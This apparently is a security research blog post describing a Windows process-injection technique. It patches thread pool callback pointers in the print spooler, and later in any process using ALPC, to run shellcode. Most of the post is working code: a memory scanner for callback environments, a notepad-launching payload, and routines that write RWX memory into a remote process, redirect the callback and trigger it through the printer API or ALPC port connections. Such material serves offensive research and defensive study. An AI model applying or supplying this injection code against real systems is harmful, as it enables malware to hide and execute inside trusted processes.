Introduction
Every application running on the Windows operating system has a thread pool, or “worker factory”. This internal mechanism lets an application offload the management of threads typically used for asynchronous operations. Automating thread management makes it easier to support callback functions that run in response to I/O events or an expiring timer. Imagine a process that needs to send and receive data over the network. Do we want the application to wait indefinitely to receive something from the network, or do we want it to perform other tasks in the meantime? Thread pooling enables more efficient management of threads and, specifically, of asynchronous callback procedures. The pointers to these callback functions can be patched in memory, which allows one to execute code indirectly, without creating a new thread. Figure 1 shows notepad running under the spooler process after a callback was patched to point at shellcode and invoked using the print spooler API.

Figure 1. Notepad running under spooler process.
Finding Callback Environments
Callback functions are stored in mostly opaque, undocumented structures. I haven’t taken the time to document them fully here because my main objective is code injection. For the print spooler, we’re only interested in the TP_ALPC structure used by TppAlpcpExecuteCallback in NTDLL.dll. This function dispatches printer requests received on the LPC port to LrpcIoComplete in RPCRT4.dll. TP_ALPC contains a TP_CALLBACK_ENVIRON structure, which I’ll refer to as a CBE from now on. CBEs can be found in both the stack and heap memory of a process, so the virtual memory we need to scan has the following attributes.
- State is MEM_COMMIT
- Type is MEM_PRIVATE
- Protect is PAGE_READWRITE
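As a minimal sketch of that filter, the predicate below tests the three attributes on values shaped like the State, Type and Protect fields that VirtualQueryEx reports in MEMORY_BASIC_INFORMATION. The constants are redefined locally with an X_ prefix so the snippet builds without windows.h; their values mirror winnt.h. The function name is_candidate_region is hypothetical and not part of the original source.

```c
#include <stdbool.h>
#include <stdint.h>

/* Local copies of the winnt.h values, prefixed so they cannot clash
   with the real macros if windows.h is also included. */
#define X_MEM_COMMIT     0x00001000u
#define X_MEM_PRIVATE    0x00020000u
#define X_PAGE_READWRITE 0x00000004u

/* Hypothetical helper: true only when a region matches all three
   attributes listed above. */
bool is_candidate_region(uint32_t state, uint32_t type, uint32_t protect)
{
    return state   == X_MEM_COMMIT  &&
           type    == X_MEM_PRIVATE &&
           protect == X_PAGE_READWRITE;
}
```

Comparing Protect for equality rather than testing a bit means that regions carrying extra modifiers, such as stack guard pages (PAGE_GUARD), are skipped. That is a design choice of this sketch, not something the original code states.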
The data we’re looking for can be interpreted using the following structure.
typedef struct _TP_CALLBACK_ENVIRON_V3 {
    TP_VERSION Version;
    PTP_POOL Pool;
    PTP_CLEANUP_GROUP CleanupGroup;
    PTP_CLEANUP_GROUP_CANCEL_CALLBACK CleanupGroupCancelCallback;
    PVOID RaceDll;
    struct _ACTIVATION_CONTEXT *ActivationContext;
    PTP_SIMPLE_CALLBACK FinalizationCallback;
    union {
        DWORD Flags;
        struct {
            DWORD LongFunction : 1;
            DWORD Persistent : 1;
            DWORD Private : 30;
        } s;
    } u;
    TP_CALLBACK_PRIORITY CallbackPriority;
    DWORD Size;
} TP_CALLBACK_ENVIRON_V3;
However, in memory, two additional pointers follow these fields: the actual callback function and a callback parameter. They likely belong to a separate structure that also appears to be undocumented.
00000000`011fbd08 00000000`00000001 ; Version
00000000`011fbd10 00007ffc`b50c0680 ntdll!TppAlpcpCleanupGroupMemberVFuncs ; Pool
00000000`011fbd18 00000000`00000000 ; CleanupGroup
00000000`011fbd20 00000000`00000000 ; CleanupGroupCancelCallback
00000000`011fbd28 00000000`00000000 ; RaceDll
00000000`011fbd30 00000000`011fbd30 ; ActivationContext
00000000`011fbd38 00000000`011fbd30 ; FinalizationCallback
00000000`011fbd40 00000000`00000000 ; Flags
00000000`011fbd48 00000000`00000000 ; CallbackPriority
00000000`011fbd50 00000000`00000000 ; Size
00000000`011fbd58 00007ffc`b38a9240 RPCRT4!LrpcIoComplete ; Callback
00000000`011fbd60 00000000`0121c948 ; CallbackParameter
The following structure is used to find valid CBEs instead of the original from the SDK.
// this structure is derived from TP_CALLBACK_ENVIRON_V3,
// but also includes two additional values. one to hold
// the callback function and the other is a callback parameter
typedef struct _TP_CALLBACK_ENVIRON_X {
    ULONG_PTR Version;
    ULONG_PTR Pool;
    ULONG_PTR CleanupGroup;
    ULONG_PTR CleanupGroupCancelCallback;
    ULONG_PTR RaceDll;
    ULONG_PTR ActivationContext;
    ULONG_PTR FinalizationCallback;
    ULONG_PTR Flags;
    ULONG_PTR CallbackPriority;
    ULONG_PTR Size;
    ULONG_PTR Callback;
    ULONG_PTR CallbackParameter;
// TP_CALLBACK_ENVIRONX and PTP_CALLBACK_ENVIRONX are the spellings
// used by the functions that follow
} TP_CALLBACK_ENVIRON_X, TP_CALLBACK_ENVIRONX, *PTP_CALLBACK_ENVIRONX;
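The extended layout can be cross-checked against the memory dump above. On a 64-bit target every field is 8 bytes wide, so Callback should sit 0x50 bytes past Version (0x011fbd58 - 0x011fbd08) and CallbackParameter at 0x58. The sketch below uses uint64_t in place of ULONG_PTR so that it builds on any platform; the type name cbe_x64 is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 64-bit mirror of TP_CALLBACK_ENVIRON_X. */
typedef struct cbe_x64 {
    uint64_t Version;
    uint64_t Pool;
    uint64_t CleanupGroup;
    uint64_t CleanupGroupCancelCallback;
    uint64_t RaceDll;
    uint64_t ActivationContext;
    uint64_t FinalizationCallback;
    uint64_t Flags;
    uint64_t CallbackPriority;
    uint64_t Size;
    uint64_t Callback;
    uint64_t CallbackParameter;
} cbe_x64;

/* Compile-time checks that the layout agrees with the dump. */
_Static_assert(offsetof(cbe_x64, ActivationContext) == 0x28,
               "ActivationContext offset");
_Static_assert(offsetof(cbe_x64, Callback) == 0x50,
               "Callback offset");
_Static_assert(offsetof(cbe_x64, CallbackParameter) == 0x58,
               "CallbackParameter offset");
_Static_assert(sizeof(cbe_x64) == 0x60,
               "twelve 8-byte fields");
```

These offsets only hold for 64-bit processes. A 32-bit build of the real structure would have 4-byte fields and different offsets.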
We read blocks of memory equivalent to the size of TP_CALLBACK_ENVIRON_X and validate them with some simple checks. The following function can determine if the memory looks like a valid CBE.
BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe) {
    MEMORY_BASIC_INFORMATION mbi;
    SIZE_T res;

    // invalid version?
    if(cbe->Version > 5) return FALSE;

    // these values shouldn't be empty
    if(cbe->Pool == 0 || cbe->FinalizationCallback == 0) return FALSE;

    // these values should be equal
    if ((LPVOID)cbe->FinalizationCallback != (LPVOID)cbe->ActivationContext) return FALSE;

    // priority shouldn't exceed TP_CALLBACK_PRIORITY_INVALID
    if(cbe->CallbackPriority > TP_CALLBACK_PRIORITY_INVALID) return FALSE;

    // the pool functions should originate from read-only memory
    res = VirtualQueryEx(hProcess, (LPVOID)cbe->Pool, &mbi, sizeof(mbi));
    if (res != sizeof(mbi)) return FALSE;
    if (!(mbi.Protect & PAGE_READONLY)) return FALSE;

    // the callback function should originate from read+execute memory
    res = VirtualQueryEx(hProcess, (LPCVOID)cbe->Callback, &mbi, sizeof(mbi));
    if (res != sizeof(mbi)) return FALSE;

    return (mbi.Protect & PAGE_EXECUTE_READ);
}
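The field-only part of these checks can be tried without touching another process. The sketch below slides over a local byte buffer one pointer-sized slot at a time and applies the same version, pool, finalization and priority tests. The names cbe_view, looks_like_cbe and find_candidate are hypothetical, the constant 3 mirrors TP_CALLBACK_PRIORITY_INVALID, and the two VirtualQueryEx checks on page protection are deliberately left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define X_PRIORITY_INVALID 3u /* mirrors TP_CALLBACK_PRIORITY_INVALID */

/* Hypothetical 64-bit view of the twelve fields. */
typedef struct cbe_view {
    uint64_t Version, Pool, CleanupGroup, CleanupGroupCancelCallback;
    uint64_t RaceDll, ActivationContext, FinalizationCallback, Flags;
    uint64_t CallbackPriority, Size, Callback, CallbackParameter;
} cbe_view;

/* Field-only subset of the checks; no process APIs involved. */
int looks_like_cbe(const cbe_view *c)
{
    if (c->Version > 5) return 0;
    if (c->Pool == 0 || c->FinalizationCallback == 0) return 0;
    if (c->FinalizationCallback != c->ActivationContext) return 0;
    if (c->CallbackPriority > X_PRIORITY_INVALID) return 0;
    return 1;
}

/* Return the byte offset of the first candidate in buf, or -1. */
long find_candidate(const unsigned char *buf, size_t len)
{
    cbe_view c;
    size_t off;

    for (off = 0; off + sizeof(c) <= len; off += sizeof(uint64_t)) {
        /* memcpy avoids alignment and aliasing assumptions about buf */
        memcpy(&c, buf + off, sizeof(c));
        if (looks_like_cbe(&c)) return (long)off;
    }
    return -1;
}
```

Because these tests are loose, they can match unrelated data. That is presumably why the original function goes on to confirm the protection of the pages that Pool and Callback point into.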
Payload
The payload is written in C and simply runs notepad. Calculator isn’t used because it’s a Metro application on Windows 10 that has specific requirements to work. The TP_ALPC structure passed to LrpcIoComplete isn’t documented, but it does include a structure similar to TP_CALLBACK_ENVIRON_V3. Once our payload executes, we first restore the original Callback and CallbackParameter values. This is required because calling WinExec triggers another call to LrpcIoComplete; without the restore, the payload would be re-entered in an infinite loop until the process crashes. After restoration, we call WinExec, followed by LrpcIoComplete with the original values.
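The ordering described above (restore first, then do the work, then forward) can be illustrated with a portable simulation that uses no Windows APIs. Everything in it is hypothetical: slot stands in for the Callback and CallbackParameter fields, saved plays the role of the structure holding the original values, and the nested dispatch call stands in for the extra callback that WinExec provokes.

```c
#include <stddef.h>

typedef void (*cb_fn)(void *param);

/* Stand-in for the two patched fields. */
typedef struct slot {
    cb_fn Callback;
    void *CallbackParameter;
} slot;

/* Saved originals plus a pointer back to the patched slot. */
typedef struct saved {
    cb_fn Callback;
    void *CallbackParameter;
    slot *owner;
} saved;

int original_calls = 0;
int hook_calls = 0;

void original_cb(void *param) { (void)param; original_calls++; }

/* Stand-in for the thread pool dispatching a callback. */
void dispatch(slot *s) { s->Callback(s->CallbackParameter); }

void hook_cb(void *param)
{
    saved *sv = (saved *)param;
    hook_calls++;

    /* 1. restore first, so a nested dispatch reaches the original */
    sv->owner->Callback = sv->Callback;
    sv->owner->CallbackParameter = sv->CallbackParameter;

    /* 2. work that causes another dispatch */
    dispatch(sv->owner);

    /* 3. forward the message that was intercepted */
    sv->Callback(sv->CallbackParameter);
}
```

With the slot patched to hook_cb, a single dispatch runs the hook once and the original twice: once for the nested dispatch and once for the forwarded message. If step 1 were moved after step 2, the nested dispatch would call hook_cb again and recurse without end.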
#ifdef TPOOL // Thread Pool Callback
// the wrong types are used here, but it doesn't really matter
typedef struct _TP_ALPC {
    // ALPC callback info
    ULONG_PTR AlpcPool;
    ULONG_PTR Unknown1;
    ULONG_PTR Unknown2;
    ULONG_PTR Unknown3;
    ULONG_PTR Unknown4;
    ULONG_PTR AlpcActivationContext;
    ULONG_PTR AlpcFinalizationCallback;
    ULONG_PTR AlpcCallback;
    ULONG_PTR Unknown5;
    // callback environment
    ULONG_PTR Version;
    ULONG_PTR Pool;
    ULONG_PTR CleanupGroup;
    ULONG_PTR CleanupGroupCancelCallback;
    ULONG_PTR RaceDll;
    ULONG_PTR ActivationContext;
    ULONG_PTR FinalizationCallback;
    ULONG_PTR Flags;
    ULONG_PTR CallbackPriority;
    ULONG_PTR Size;
    ULONG_PTR Callback;
    ULONG_PTR CallbackParameter;
} TP_ALPC;

typedef struct _tp_param_t {
    ULONG_PTR Callback;
    ULONG_PTR CallbackParameter;
} tp_param;

typedef TP_ALPC TP_ALPC, *PTP_ALPC;

typedef void (WINAPI *LrpcIoComplete_t)(LPVOID, LPVOID, LPVOID, LPVOID);

VOID TpCallBack(LPVOID tp_callback_instance,
  LPVOID param, PTP_ALPC alpc, LPVOID unknown2)
#endif
{
    WinExec_t pWinExec;
    DWORD szWinExec[2], szNotepad[3];
#ifdef TPOOL
    LrpcIoComplete_t pLrpcIoComplete;
    tp_param *tp=(tp_param*)param;
    ULONG_PTR op;

    // param should contain pointer to tp_param
    pLrpcIoComplete = (LrpcIoComplete_t)tp->Callback;
    op = tp->CallbackParameter;

    // restore original values
    // this will indicate we executed ok,
    // but is also required before the call to WinExec
    alpc->Callback = tp->Callback;
    alpc->CallbackParameter = tp->CallbackParameter;
#endif
    // now call WinExec to start notepad
    szWinExec[0] = *(DWORD*)"WinE";
    szWinExec[1] = *(DWORD*)"xec\0";
    szNotepad[0] = *(DWORD*)"note";
    szNotepad[1] = *(DWORD*)"pad\0";

    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szNotepad, SW_SHOW);
    }

    // finally, pass the original message on..
#ifdef TPOOL
    pLrpcIoComplete(tp_callback_instance,
      (LPVOID)alpc->CallbackParameter, alpc, unknown2);
#endif

#ifndef TPOOL
    return 0;
#endif
}
Deploying and Triggering Payload
Here, we use a conventional method of sharing the payload/shellcode with the spooler process. This consists of:
- OpenProcess(“spoolsv.exe”)
- VirtualAllocEx(payloadSize, PAGE_EXECUTE_READWRITE)
- WriteProcessMemory(payload, payloadSize)
Once we have a valid CBE, we patch the Callback pointer with the address of our payload and try to invoke it using the print spooler API. Although OpenPrinter is used in the following code, you could probably use any other API that interacts with the print spooler service. Underneath the API, interaction with the print spooler service is conducted over Local Procedure Call (LPC), a form of interprocess communication. Over the network, Remote Procedure Call (RPC) is used instead, but we’re obviously not injecting over the network. 😉
// try inject and run payload in remote process using CBE
BOOL inject(HANDLE hp, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
    LPVOID cs = NULL;
    BOOL bStatus = FALSE;
    TP_CALLBACK_ENVIRONX cpy; // local copy of cbe
    SIZE_T wr;
    HANDLE phPrinter = NULL;
    tp_param tp;

    // allocate memory in remote for payload and callback parameter
    cs = VirtualAllocEx(hp, NULL, payloadSize + sizeof(tp_param),
      MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (cs != NULL) {
      // write payload to remote process
      WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
      // backup CBE
      CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
      // copy original callback address and parameter
      tp.Callback = cpy.Callback;
      tp.CallbackParameter = cpy.CallbackParameter;
      // write callback+parameter to remote process
      WriteProcessMemory(hp, (LPBYTE)cs + payloadSize, &tp, sizeof(tp), &wr);
      // update original callback with address of payload and parameter
      cpy.Callback = (ULONG_PTR)cs;
      cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + payloadSize;
      // update CBE in remote process
      WriteProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr);
      // trigger execution of payload
      if(OpenPrinter(NULL, &phPrinter, NULL)) {
        ClosePrinter(phPrinter);
      }
      // read back the CBE
      ReadProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr);
      // restore the original cbe
      WriteProcessMemory(hp, ds, cbe, sizeof(cpy), &wr);
      // if callback pointer is the original, we succeeded.
      bStatus = (cpy.Callback == cbe->Callback);
      // release memory for payload
      // (dwSize must be 0 when MEM_RELEASE is used)
      VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
    }
    return bStatus;
}
Figure 2 shows injection attempts against callbacks belonging to four different DLLs before finally succeeding with RPCRT4.dll.

Figure 2. Code injection via Callback Environment
The code shown here is only a proof of concept and could be refined to be more elegant. I only use the print spooler here, but other processes that use thread pooling could also be leveraged for code injection. Sources can be found here.
Update
To use the same method of injection against almost any other process that uses ALPC, you can connect directly to the ALPC port.
/**
  Get a list of ALPC ports with names
*/
DWORD GetALPCPorts(process_info *pi) {
    ULONG len=0, total=0;
    NTSTATUS status;
    LPVOID list=NULL;
    DWORD i;
    HANDLE hObj;
    PSYSTEM_HANDLE_INFORMATION hl;
    POBJECT_NAME_INFORMATION objName;

    pi->ports.clear();

    // get a list of handles for the local system
    for(len=MAX_BUFSIZ;;len+=MAX_BUFSIZ) {
      list = xmalloc(len);
      status = NtQuerySystemInformation(
        SystemHandleInformation, list, len, &total);
      // break from loop if ok
      if(NT_SUCCESS(status)) break;
      // free list and continue
      xfree(list);
    }

    hl = (PSYSTEM_HANDLE_INFORMATION)list;
    objName = (POBJECT_NAME_INFORMATION)xmalloc(8192);

    // for each handle
    for(i=0; i<hl->NumberOfHandles; i++) {
      // skip if process ids don't match
      if(hl->Handles[i].UniqueProcessId != pi->pid) continue;

      // skip if the type isn't an ALPC port
      // note this value might be different on other systems.
      // this was tested on 64-bit Windows 10
      if(hl->Handles[i].ObjectTypeIndex != 45) continue;

      // duplicate the handle object
      status = NtDuplicateObject(
        pi->hp, (HANDLE)hl->Handles[i].HandleValue,
        GetCurrentProcess(), &hObj, 0, 0, 0);

      // continue with next entry if we failed
      if(!NT_SUCCESS(status)) continue;

      // try query the name
      status = NtQueryObject(hObj,
        ObjectNameInformation, objName, 8192, NULL);

      // got it okay?
      if(NT_SUCCESS(status) && objName->Name.Buffer!=NULL) {
        // save to list
        pi->ports.push_back(objName->Name.Buffer);
      }
      // close handle object
      NtClose(hObj);
    }
    // free list of handles
    xfree(objName);
    xfree(list);
    return pi->ports.size();
}
Connecting to ALPC port
// connect to ALPC port
BOOL ALPC_Connect(std::wstring path) {
    SECURITY_QUALITY_OF_SERVICE ss;
    NTSTATUS status;
    UNICODE_STRING server;
    ULONG MsgLen=0;
    HANDLE h=NULL;

    ZeroMemory(&ss, sizeof(ss));
    ss.Length = sizeof(ss);
    ss.ImpersonationLevel = SecurityImpersonation;
    ss.EffectiveOnly = FALSE;
    ss.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;

    RtlInitUnicodeString(&server, path.c_str());

    status = NtConnectPort(&h, &server, &ss, NULL,
      NULL, (PULONG)&MsgLen, NULL, NULL);

    // only close the handle if the connection succeeded
    if(NT_SUCCESS(status) && h != NULL) NtClose(h);

    return NT_SUCCESS(status);
}
Deploying/Triggering
Same as before, except we have to try multiple ALPC ports instead of just using the print spooler API.
// try inject and run payload in remote process using CBE
BOOL ALPC_deploy(process_info *pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
    LPVOID cs = NULL;
    BOOL bInject = FALSE;
    TP_CALLBACK_ENVIRONX cpy; // local copy of cbe
    SIZE_T wr;
    tp_param tp;
    DWORD i;

    // allocate memory in remote for payload and callback parameter
    cs = VirtualAllocEx(pi->hp, NULL,
      pi->payloadSize + sizeof(tp_param),
      MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (cs != NULL) {
      // write payload to remote process
      WriteProcessMemory(pi->hp, cs, pi->payload, pi->payloadSize, &wr);
      // backup CBE
      CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
      // copy original callback address and parameter
      tp.Callback = cpy.Callback;
      tp.CallbackParameter = cpy.CallbackParameter;
      // write callback+parameter to remote process
      WriteProcessMemory(pi->hp, (LPBYTE)cs + pi->payloadSize, &tp, sizeof(tp), &wr);
      // update original callback with address of payload and parameter
      cpy.Callback = (ULONG_PTR)cs;
      cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + pi->payloadSize;
      // update CBE in remote process
      WriteProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr);
      // trigger execution of payload
      for(i=0;i<pi->ports.size(); i++) {
        ALPC_Connect(pi->ports[i]);
        // read back the CBE
        ReadProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr);
        // if callback pointer is the original, we succeeded.
        bInject = (cpy.Callback == cbe->Callback);
        if(bInject) break;
      }
      // restore the original cbe
      WriteProcessMemory(pi->hp, ds, cbe, sizeof(cpy), &wr);
      // release memory for payload
      // (dwSize must be 0 when MEM_RELEASE is used)
      VirtualFreeEx(pi->hp, cs, 0, MEM_RELEASE);
    }
    return bInject;
}